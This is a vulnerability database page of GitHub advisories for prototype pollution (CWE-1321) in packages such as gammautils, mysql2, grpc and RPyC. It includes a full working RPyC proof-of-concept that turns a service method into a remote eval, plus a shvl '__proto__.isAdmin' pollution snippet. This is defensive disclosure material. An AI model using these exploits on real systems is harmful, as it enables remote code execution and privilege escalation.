Common Weakness Enumeration

CWE-1321

Allowed

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Abstraction: Variant · Status: Incomplete

The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.

785 vulnerabilities reference this CWE, most recent first.

GHSA-PGMG-GF5P-54J8

Vulnerability from github – Published: 2021-05-06 18:26 – Updated: 2023-09-07 00:00
VLAI
Summary
Prototype Pollution in gammautils
Details

All versions of package gammautils up to and including version 0.0.81 are vulnerable to Prototype Pollution via the deepSet and deepMerge functions.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "gammautils"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.81"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-7718"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-05T18:05:47Z",
    "nvd_published_at": "2020-09-01T10:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "All versions of package gammautils up to and including version 0.0.81 are vulnerable to Prototype Pollution via the `deepSet` and `deepMerge` functions.",
  "id": "GHSA-pgmg-gf5p-54j8",
  "modified": "2023-09-07T00:00:21Z",
  "published": "2021-05-06T18:26:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7718"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-GAMMAUTILS-598670"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in gammautils"
}

GHSA-PH28-WWFJ-FV7F

Vulnerability from github – Published: 2022-05-14 00:01 – Updated: 2022-05-25 22:53
VLAI
Summary
Prototype Pollution in sds
Details

This affects the package sds from 0.0.0. The library could be tricked into adding or modifying properties of the Object.prototype by abusing the set function located in js/set.js. Note: This vulnerability derives from an incomplete fix to CVE-2020-7618

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "sds"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "4.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-25862"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-05-25T22:53:54Z",
    "nvd_published_at": "2022-05-13T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "This affects the package sds from 0.0.0. The library could be tricked into adding or modifying properties of the Object.prototype by abusing the set function located in js/set.js. **Note:** This vulnerability derives from an incomplete fix to CVE-2020-7618",
  "id": "GHSA-ph28-wwfj-fv7f",
  "modified": "2022-05-25T22:53:54Z",
  "published": "2022-05-14T00:01:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7618"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25862"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/monsterkodi/sds"
    },
    {
      "type": "WEB",
      "url": "https://github.com/monsterkodi/sds/blob/master/js/set.js"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-SDS-2385944"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in sds"
}

GHSA-PHH3-2P9M-W6J5

Vulnerability from github – Published: 2024-05-02 15:30 – Updated: 2024-07-03 20:11
VLAI
Summary
Jenkins Subversion Partial Release Manager Plugin programmatically disables the fix for CVE-2016-3721
Details

Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier programmatically sets the Java system property hudson.model.ParametersAction.keepUndefinedParameters whenever a build is triggered from a release tag with the 'Svn-Partial Release Manager' SCM. Doing so disables the fix for SECURITY-170 / CVE-2016-3721.

As of publication of this advisory, there is no fix.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.plugins:partial-release-manager"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-34148"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-05-03T19:37:35Z",
    "nvd_published_at": "2024-05-02T14:15:10Z",
    "severity": "MODERATE"
  },
  "details": "Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier programmatically sets the Java system property `hudson.model.ParametersAction.keepUndefinedParameters` whenever a build is triggered from a release tag with the \u0027Svn-Partial Release Manager\u0027 SCM. Doing so disables the fix for [SECURITY-170](https://www.jenkins.io/security/advisory/2016-05-11/#arbitrary-build-parameters-are-passed-to-build-scripts-as-environment-variables) / CVE-2016-3721.\n\nAs of publication of this advisory, there is no fix.",
  "id": "GHSA-phh3-2p9m-w6j5",
  "modified": "2024-07-03T20:11:11Z",
  "published": "2024-05-02T15:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34148"
    },
    {
      "type": "WEB",
      "url": "https://www.jenkins.io/security/advisory/2024-05-02/#SECURITY-3331"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2024/05/02/3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Jenkins Subversion Partial Release Manager Plugin programmatically disables the fix for CVE-2016-3721 "
}

GHSA-PJ4G-4488-WMXM

Vulnerability from github – Published: 2021-02-17 19:50 – Updated: 2021-09-27 22:48
VLAI
Summary
Dynamic modification of RPyC service due to missing security check
Details

Impact

Version 4.1.0 of RPyC has a vulnerability that affects custom RPyC services making it susceptible to authenticated remote attacks.

Patches

Git commits between September 2018 and October 2019 and version 4.1.0 are vulnerable. Use a version of RPyC that is not affected.

Workarounds

The commit d818ecc83a92548994db75a0e9c419c7bce680d6 could be used as a patch to add the missing access check.

References

CVE-2019-16328 RPyC Security Documentation

For more information

If you have any questions or comments about this advisory: * Open an issue using GitHub

Proof of Concept

import logging
import rpyc
import tempfile
from subprocess import Popen, PIPE
import unittest


PORT = 18861
SERVER_SCRIPT = f"""#!/usr/bin/env python
import rpyc
from rpyc.utils.server import ThreadedServer, ThreadPoolServer
from rpyc import SlaveService
import rpyc


class Foe(object):
    foo = "bar"


class Fee(rpyc.Service):
    exposed_Fie = Foe

    def exposed_nop(self):
        return


if __name__ == "__main__":
    server = ThreadedServer(Fee, port={PORT}, auto_register=False)
    thd = server.start()
"""


def setattr_orig(target, attrname, codeobj):
    setattr(target, attrname, codeobj)


def myeval(self=None, cmd="__import__('sys')"):
    return eval(cmd)


def get_code(obj_codetype, func, filename=None, name=None):
    func_code = func.__code__
    arg_names = ['co_argcount', 'co_posonlyargcount', 'co_kwonlyargcount', 'co_nlocals', 'co_stacksize', 'co_flags',
                 'co_code', 'co_consts', 'co_names', 'co_varnames', 'co_filename', 'co_name', 'co_firstlineno',
                 'co_lnotab', 'co_freevars', 'co_cellvars']

    codetype_args = [getattr(func_code, n) for n in arg_names]
    if filename:
        codetype_args[arg_names.index('co_filename')] = filename
    if name:
        codetype_args[arg_names.index('co_name')] = name
    mycode = obj_codetype(*codetype_args)
    return mycode


def _vercmp_gt(ver1, ver2):
    ver1_gt_ver2 = False
    for i, v1 in enumerate(ver1):
        v2 = ver2[i]
        if v1 > v2:
            ver1_gt_ver2 = True
            break
        elif v1 == v2:
            continue
        else:  # v1 < v2
            break
    return ver1_gt_ver2


@unittest.skipIf(not _vercmp_gt(rpyc.__version__, (3, 4, 4)), "unaffected version")
class Test_InfoDisclosure_Service(unittest.TestCase):

    @classmethod
    def setUpClass(cls):

        cls.logger = logging.getLogger('rpyc')
        cls.logger.setLevel(logging.DEBUG)  # NOTSET only traverses until another level is found, so DEBUG is preferred
        cls.hscript = tempfile.NamedTemporaryFile()
        cls.hscript.write(SERVER_SCRIPT.encode())
        cls.hscript.flush()
        while cls.hscript.file.tell() != len(SERVER_SCRIPT):
            pass
        cls.server = Popen(["python", cls.hscript.name], stdout=PIPE, stderr=PIPE, text=True)
        cls.conn = rpyc.connect("localhost", PORT)

    @classmethod
    def tearDownClass(cls):
        cls.conn.close()
        cls.logger.info(cls.server.stdout.read())
        cls.logger.info(cls.server.stderr.read())
        cls.server.kill()
        cls.hscript.close()

    def netref_getattr(self, netref, attrname):
        # PoC CWE-358: abuse __cmp__ function that was missing a security check
        handler = rpyc.core.consts.HANDLE_CMP
        return self.conn.sync_request(handler, netref, attrname, '__getattribute__')

    def test_1_modify_nop(self):
        # create netrefs for builtins and globals that will be used to construct on remote
        remote_svc_proto = self.netref_getattr(self.conn.root, '_protocol')
        remote_dispatch = self.netref_getattr(remote_svc_proto, '_dispatch_request')
        remote_class_globals = self.netref_getattr(remote_dispatch, '__globals__')
        remote_modules = self.netref_getattr(remote_class_globals['sys'], 'modules')
        _builtins = remote_modules['builtins']
        remote_builtins = {k: self.netref_getattr(_builtins, k) for k in dir(_builtins)}

        # populate globals for CodeType calls on remote
        remote_globals = remote_builtins['dict']()
        for name, netref in remote_builtins.items():
            remote_globals[name] = netref
        for name, netref in self.netref_getattr(remote_modules, 'items')():
            remote_globals[name] = netref

        # create netrefs for types to create remote function malicously
        remote_types = remote_builtins['__import__']("types")
        remote_types_CodeType = self.netref_getattr(remote_types, 'CodeType')
        remote_types_FunctionType = self.netref_getattr(remote_types, 'FunctionType')

        # remote eval function constructed
        remote_eval_codeobj = get_code(remote_types_CodeType, myeval, filename='test_code.py', name='__code__')
        remote_eval = remote_types_FunctionType(remote_eval_codeobj, remote_globals)
        # PoC CWE-913: modify the exposed_nop of service
        #   by binding various netrefs in this execution frame, they are cached in
        #   the remote address space. setattr and eval functions are cached for the life
        #   of the netrefs in the frame. A consequence of Netref classes inheriting
        #   BaseNetref, each object is cached under_local_objects. So, we are able
        #   to construct arbitrary code using types and builtins.

        # use the builtin netrefs to modify the service to use the constructed eval func
        remote_setattr = remote_builtins['setattr']
        remote_type = remote_builtins['type']
        remote_setattr(remote_type(self.conn.root), 'exposed_nop', remote_eval)

        # show that nop was replaced by eval to complete the PoC
        remote_sys = self.conn.root.nop('__import__("sys")')
        remote_stack = self.conn.root.nop('"".join(__import__("traceback").format_stack())')
        self.assertEqual(type(remote_sys).__name__, 'builtins.module')
        self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref)
        self.assertIn('rpyc/utils/server.py', remote_stack)

    def test_2_new_conn_impacted(self):
        # demostrate impact and scope of vuln for new connections
        self.conn.close()
        self.conn = rpyc.connect("localhost", PORT)
        # show new conn can still use nop as eval
        remote_sys = self.conn.root.nop('__import__("sys")')
        remote_stack = self.conn.root.nop('"".join(__import__("traceback").format_stack())')
        self.assertEqual(type(remote_sys).__name__, 'builtins.module')
        self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref)
        self.assertIn('rpyc/utils/server.py', remote_stack)


if __name__ == "__main__":
    unittest.main()
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rpyc"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.1.0"
            },
            {
              "fixed": "4.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "4.1.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2019-16328"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-02-17T19:50:44Z",
    "nvd_published_at": "2019-10-03T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nVersion 4.1.0 of RPyC has a vulnerability that affects custom RPyC services making it susceptible to authenticated remote attacks.\n\n### Patches\nGit commits between September 2018 and October 2019 and version 4.1.0 are vulnerable. Use a version of RPyC that is not affected.\n\n### Workarounds\nThe commit `d818ecc83a92548994db75a0e9c419c7bce680d6` could be used as a patch to add the missing access check.\n\n### References\n[CVE-2019-16328](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16328)\n[RPyC Security Documentation](https://rpyc.readthedocs.io/en/latest/docs/security.html#security)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue using [GitHub](https://github.com/tomerfiliba-org/rpyc)\n\n### Proof of Concept\n```\nimport logging\nimport rpyc\nimport tempfile\nfrom subprocess import Popen, PIPE\nimport unittest\n\n\nPORT = 18861\nSERVER_SCRIPT = f\"\"\"#!/usr/bin/env python\nimport rpyc\nfrom rpyc.utils.server import ThreadedServer, ThreadPoolServer\nfrom rpyc import SlaveService\nimport rpyc\n\n\nclass Foe(object):\n    foo = \"bar\"\n\n\nclass Fee(rpyc.Service):\n    exposed_Fie = Foe\n\n    def exposed_nop(self):\n        return\n\n\nif __name__ == \"__main__\":\n    server = ThreadedServer(Fee, port={PORT}, auto_register=False)\n    thd = server.start()\n\"\"\"\n\n\ndef setattr_orig(target, attrname, codeobj):\n    setattr(target, attrname, codeobj)\n\n\ndef myeval(self=None, cmd=\"__import__(\u0027sys\u0027)\"):\n    return eval(cmd)\n\n\ndef get_code(obj_codetype, func, filename=None, name=None):\n    func_code = func.__code__\n    arg_names = [\u0027co_argcount\u0027, \u0027co_posonlyargcount\u0027, \u0027co_kwonlyargcount\u0027, \u0027co_nlocals\u0027, \u0027co_stacksize\u0027, \u0027co_flags\u0027,\n                 \u0027co_code\u0027, \u0027co_consts\u0027, \u0027co_names\u0027, \u0027co_varnames\u0027, \u0027co_filename\u0027, \u0027co_name\u0027, \u0027co_firstlineno\u0027,\n                 \u0027co_lnotab\u0027, \u0027co_freevars\u0027, \u0027co_cellvars\u0027]\n\n    codetype_args = [getattr(func_code, n) for n in arg_names]\n    if filename:\n        codetype_args[arg_names.index(\u0027co_filename\u0027)] = filename\n    if name:\n        codetype_args[arg_names.index(\u0027co_name\u0027)] = name\n    mycode = obj_codetype(*codetype_args)\n    return mycode\n\n\ndef _vercmp_gt(ver1, ver2):\n    ver1_gt_ver2 = False\n    for i, v1 in enumerate(ver1):\n        v2 = ver2[i]\n        if v1 \u003e v2:\n            ver1_gt_ver2 = True\n            break\n        elif v1 == v2:\n            continue\n        else:  # v1 \u003c v2\n            break\n    return ver1_gt_ver2\n\n\n@unittest.skipIf(not _vercmp_gt(rpyc.__version__, (3, 4, 4)), \"unaffected version\")\nclass Test_InfoDisclosure_Service(unittest.TestCase):\n\n    @classmethod\n    def setUpClass(cls):\n\n        cls.logger = logging.getLogger(\u0027rpyc\u0027)\n        cls.logger.setLevel(logging.DEBUG)  # NOTSET only traverses until another level is found, so DEBUG is preferred\n        cls.hscript = tempfile.NamedTemporaryFile()\n        cls.hscript.write(SERVER_SCRIPT.encode())\n        cls.hscript.flush()\n        while cls.hscript.file.tell() != len(SERVER_SCRIPT):\n            pass\n        cls.server = Popen([\"python\", cls.hscript.name], stdout=PIPE, stderr=PIPE, text=True)\n        cls.conn = rpyc.connect(\"localhost\", PORT)\n\n    @classmethod\n    def tearDownClass(cls):\n        cls.conn.close()\n        cls.logger.info(cls.server.stdout.read())\n        cls.logger.info(cls.server.stderr.read())\n        cls.server.kill()\n        cls.hscript.close()\n\n    def netref_getattr(self, netref, attrname):\n        # PoC CWE-358: abuse __cmp__ function that was missing a security check\n        handler = rpyc.core.consts.HANDLE_CMP\n        return self.conn.sync_request(handler, netref, attrname, \u0027__getattribute__\u0027)\n\n    def test_1_modify_nop(self):\n        # create netrefs for builtins and globals that will be used to construct on remote\n        remote_svc_proto = self.netref_getattr(self.conn.root, \u0027_protocol\u0027)\n        remote_dispatch = self.netref_getattr(remote_svc_proto, \u0027_dispatch_request\u0027)\n        remote_class_globals = self.netref_getattr(remote_dispatch, \u0027__globals__\u0027)\n        remote_modules = self.netref_getattr(remote_class_globals[\u0027sys\u0027], \u0027modules\u0027)\n        _builtins = remote_modules[\u0027builtins\u0027]\n        remote_builtins = {k: self.netref_getattr(_builtins, k) for k in dir(_builtins)}\n\n        # populate globals for CodeType calls on remote\n        remote_globals = remote_builtins[\u0027dict\u0027]()\n        for name, netref in remote_builtins.items():\n            remote_globals[name] = netref\n        for name, netref in self.netref_getattr(remote_modules, \u0027items\u0027)():\n            remote_globals[name] = netref\n\n        # create netrefs for types to create remote function malicously\n        remote_types = remote_builtins[\u0027__import__\u0027](\"types\")\n        remote_types_CodeType = self.netref_getattr(remote_types, \u0027CodeType\u0027)\n        remote_types_FunctionType = self.netref_getattr(remote_types, \u0027FunctionType\u0027)\n\n        # remote eval function constructed\n        remote_eval_codeobj = get_code(remote_types_CodeType, myeval, filename=\u0027test_code.py\u0027, name=\u0027__code__\u0027)\n        remote_eval = remote_types_FunctionType(remote_eval_codeobj, remote_globals)\n        # PoC CWE-913: modify the exposed_nop of service\n        #   by binding various netrefs in this execution frame, they are cached in\n        #   the remote address space. setattr and eval functions are cached for the life\n        #   of the netrefs in the frame. A consequence of Netref classes inheriting\n        #   BaseNetref, each object is cached under_local_objects. So, we are able\n        #   to construct arbitrary code using types and builtins.\n\n        # use the builtin netrefs to modify the service to use the constructed eval func\n        remote_setattr = remote_builtins[\u0027setattr\u0027]\n        remote_type = remote_builtins[\u0027type\u0027]\n        remote_setattr(remote_type(self.conn.root), \u0027exposed_nop\u0027, remote_eval)\n\n        # show that nop was replaced by eval to complete the PoC\n        remote_sys = self.conn.root.nop(\u0027__import__(\"sys\")\u0027)\n        remote_stack = self.conn.root.nop(\u0027\"\".join(__import__(\"traceback\").format_stack())\u0027)\n        self.assertEqual(type(remote_sys).__name__, \u0027builtins.module\u0027)\n        self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref)\n        self.assertIn(\u0027rpyc/utils/server.py\u0027, remote_stack)\n\n    def test_2_new_conn_impacted(self):\n        # demostrate impact and scope of vuln for new connections\n        self.conn.close()\n        self.conn = rpyc.connect(\"localhost\", PORT)\n        # show new conn can still use nop as eval\n        remote_sys = self.conn.root.nop(\u0027__import__(\"sys\")\u0027)\n        remote_stack = self.conn.root.nop(\u0027\"\".join(__import__(\"traceback\").format_stack())\u0027)\n        self.assertEqual(type(remote_sys).__name__, \u0027builtins.module\u0027)\n        self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref)\n        self.assertIn(\u0027rpyc/utils/server.py\u0027, remote_stack)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n```",
  "id": "GHSA-pj4g-4488-wmxm",
  "modified": "2021-09-27T22:48:17Z",
  "published": "2021-02-17T19:50:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/tomerfiliba-org/rpyc/security/advisories/GHSA-pj4g-4488-wmxm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16328"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/tomerfiliba-org/rpyc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tomerfiliba/rpyc"
    },
    {
      "type": "WEB",
      "url": "https://rpyc.readthedocs.io/en/latest/docs/security.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00046.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00004.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dynamic modification of RPyC service due to missing security check"
}

GHSA-PMH2-WPJM-FJ45

Vulnerability from github – Published: 2024-05-30 18:34 – Updated: 2024-06-06 16:49
VLAI
Summary
mysql2 vulnerable to Prototype Pollution
Details

Versions of the package mysql2 before 3.9.8 are vulnerable to Prototype Pollution due to improper user input sanitization passed to fields and tables when using nestTables.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "mysql2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.9.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-21512"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-05-30T18:34:32Z",
    "nvd_published_at": "2024-05-29T05:16:08Z",
    "severity": "HIGH"
  },
  "details": "Versions of the package mysql2 before 3.9.8 are vulnerable to Prototype Pollution due to improper user input sanitization passed to fields and tables when using nestTables.",
  "id": "GHSA-pmh2-wpjm-fj45",
  "modified": "2024-06-06T16:49:01Z",
  "published": "2024-05-30T18:34:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21512"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sidorares/node-mysql2/pull/2702"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sidorares/node-mysql2/commit/efe3db527a2c94a63c2d14045baba8dfefe922bc"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/domdomi3/e9f0f9b9b1ed6bfbbc0bea87c5ca1e4a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sidorares/node-mysql2"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-7176010"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-JS-MYSQL2-6861580"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "mysql2 vulnerable to Prototype Pollution"
}

GHSA-PP3H-G655-HHFP

Vulnerability from github – Published: 2024-07-01 15:32 – Updated: 2024-07-03 18:47
VLAI
Details

amoyjs amoy common v1.0.10 was discovered to contain a prototype pollution via the function setValue. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-39003"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-01T13:15:05Z",
    "severity": "HIGH"
  },
  "details": "amoyjs amoy common v1.0.10 was discovered to contain a prototype pollution via the function setValue. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.",
  "id": "GHSA-pp3h-g655-hhfp",
  "modified": "2024-07-03T18:47:35Z",
  "published": "2024-07-01T15:32:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39003"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/mestrtee/02091aa86c6c14c29b9703642439dd03"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-PP75-XFPW-37G9

Vulnerability from github – Published: 2021-05-10 19:16 – Updated: 2021-04-19 22:57
VLAI
Summary
Prototype pollution in grpc and @grpc/grpc-js
Details

"The package grpc before 1.24.4 and the package @grpc/grpc-js before 1.1.8 are vulnerable to Prototype Pollution via loadPackageDefinition."

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "grpc"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.24.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@grpc/grpc-js"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-7768"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-19T22:57:05Z",
    "nvd_published_at": "2020-11-11T11:15:00Z",
    "severity": "HIGH"
  },
  "details": "\"The package grpc before 1.24.4 and the package @grpc/grpc-js before 1.1.8 are vulnerable to Prototype Pollution via loadPackageDefinition.\"",
  "id": "GHSA-pp75-xfpw-37g9",
  "modified": "2021-04-19T22:57:05Z",
  "published": "2021-05-10T19:16:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7768"
    },
    {
      "type": "WEB",
      "url": "https://github.com/grpc/grpc-node/pull/1605"
    },
    {
      "type": "WEB",
      "url": "https://github.com/grpc/grpc-node/pull/1606"
    },
    {
      "type": "WEB",
      "url": "https://github.com/grpc/grpc-node/releases/tag/grpc%401.24.4"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038819"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-GRPC-598671"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-GRPCGRPCJS-1038818"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/package/@grpc/grpc-js"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/package/grpc"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype pollution in grpc and @grpc/grpc-js"
}

GHSA-PQWC-3VHW-QCVQ

Vulnerability from github – Published: 2022-05-24 17:37 – Updated: 2024-02-01 21:00
VLAI
Summary
shvl vulnerable to prototype pollution
Details

Overview

Prototype pollution vulnerability in 'shvl' versions 1.0.0 through 2.0.1 allows an attacker to cause a denial of service and may lead to remote code execution.

Details

The NPM module 'shvl' can be abused by Prototype Pollution vulnerability since the function 'set()' did not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.

PoC Details

The 'set()' function accepts four arguments object, path, val, obj. Due to the absence of validation, at values passed into path, val arguments, an attacker can supply a malicious value by adjusting the path value to include the __proto__ property. Since there is no validation before assigning property to check whether the assigned path is the Object's own property or not, the property isAdmin will be directly be assigned to the empty obj({}) thereby polluting the Object prototype. Later in the code, if there is a check to validate isAdmin the valued would be substituted as "true" as it had been polluted.

const shvl = require('shvl');
var obj = {}
console.log("Before : " + obj.isAdmin);
shvl.set(obj, '__proto__.isAdmin', true);
console.log("After : " + obj.isAdmin);

Affected Environments

1.0.0-2.0.1

Remediation

There are a couple of ways to mitigate prototype pollution vulnerabilities, for example: Most of the cases can be solved by freezing an object which doesn’t allow to add, remove, or change its properties. Validating the JSON input with schema validation, this guarantees that the JSON input contains only predefined attributes. We can change the objects, so they won’t have any prototype association by using “Object.create”.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.0.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "shvl"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "2.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-28278"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-02-01T21:00:24Z",
    "nvd_published_at": "2020-12-29T18:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "### Overview\nPrototype pollution vulnerability in \u0027shvl\u0027 versions 1.0.0 through 2.0.1 allows an attacker to cause a denial of service and may lead to remote code execution.\n\n### Details\nThe NPM module \u0027shvl\u0027 can be abused by Prototype Pollution vulnerability since the function \u0027set()\u0027 did not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or able to manipulate the property which leads to Denial of Service or potentially Remote code execution.\n\n### PoC Details\nThe \u0027set()\u0027 function accepts four arguments `object, path, val, obj`. Due to the absence of validation, at values passed into `path, val` arguments, an attacker can supply a malicious value by adjusting the `path` value to include the `__proto__` property. Since there is no validation before assigning property to check whether the assigned `path` is the Object\u0027s own property or not, the property `isAdmin` will be directly be assigned to the empty obj({}) thereby polluting the Object prototype. Later in the code, if there is a check to validate `isAdmin` the valued would be substituted as \"true\" as it had been polluted.\n\n```js\nconst shvl = require(\u0027shvl\u0027);\nvar obj = {}\nconsole.log(\"Before : \" + obj.isAdmin);\nshvl.set(obj, \u0027__proto__.isAdmin\u0027, true);\nconsole.log(\"After : \" + obj.isAdmin);\n```\n\n### Affected Environments\n1.0.0-2.0.1\n\n### Remediation\nThere are a couple of ways to mitigate prototype pollution vulnerabilities, for example: Most of the cases can be solved by freezing an object which doesn\u2019t allow to add, remove, or change its properties. Validating the JSON input with schema validation, this guarantees that the JSON input contains only predefined attributes. We can change the objects, so they won\u2019t have any prototype association by using \u201cObject.create\u201d.",
